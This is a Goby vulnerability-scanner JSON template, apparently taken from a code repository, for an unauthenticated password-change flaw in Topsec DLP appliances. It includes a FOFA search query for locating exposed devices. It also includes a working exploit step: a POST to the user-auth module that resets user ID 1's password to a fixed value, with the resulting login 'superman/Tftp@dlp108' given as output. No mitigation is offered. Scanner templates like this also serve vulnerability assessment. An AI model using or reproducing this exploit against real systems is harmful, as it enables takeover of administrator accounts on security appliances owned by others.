Goby/json/Topsec-DLP-unauthorized-pas...

80 lines
1.8 KiB
JSON

{
"Name": "Topsec DLP unauthorized password change",
"Description": "",
"Product": "Topsec DLP",
"Homepage": "https://www.topsec.com.cn/",
"DisclosureDate": "2020-08-18",
"Author": "itardc@163.com",
"FofaQuery": "body=\"static/images/login/topdlp_show.png\" || title=\"天融信 - Trial\"",
"GobyQuery": "",
"Level": "3",
"Impact": "",
"Recommendation": "",
"References": [
"https://fofa.so"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"data": "",
"data_type": "text",
"follow_redirect": false,
"method": "GET",
"uri": "/"
},
"ResponseTest": {
"checks": [
{
"bz": "",
"operation": "==",
"type": "item",
"value": "200",
"variable": "$code"
}
],
"operation": "AND",
"type": "group"
}
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"data": "uid=1&pd=Tftp@dlp108&mod_pwd=1&dlp_perm=1",
"data_type": "text",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
},
"method": "POST",
"uri": "/?module=auth_user&action=mod_edit_pwd"
},
"SetVariable": [
"output|superman/Tftp@dlp108"
]
}
],
"Tags": [
"unauthorized"
],
"CVEIDs": null,
"CVSSScore": null,
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": ["Topsec-DLP"]
},
"Disable": true
}